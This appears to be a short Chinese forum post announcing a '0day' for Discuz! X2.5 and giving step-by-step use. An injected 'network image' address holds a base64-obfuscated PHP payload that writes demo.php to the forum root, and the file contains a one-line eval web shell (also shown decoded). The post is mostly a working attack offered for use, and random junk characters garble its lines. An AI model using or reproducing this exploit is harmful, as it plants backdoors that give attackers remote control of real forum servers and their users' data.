DZ X2.5最新0day0 n% j# q6 r) N2 z' r5 E
1.注册任意账户0 t% P7 X' Y& }* {& |
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了( F5 k i) W. I5 n( g
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码
7 Z% |* u! W/ J, ^<?php @eval($_POST[c]); ?>ok/ x! W" s3 c- s& l' W, H" S
<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?> 7 d7 U( s' G; T' D5 W% k
4.访问日志,论坛根目录下生成demo.php,一句发密码C |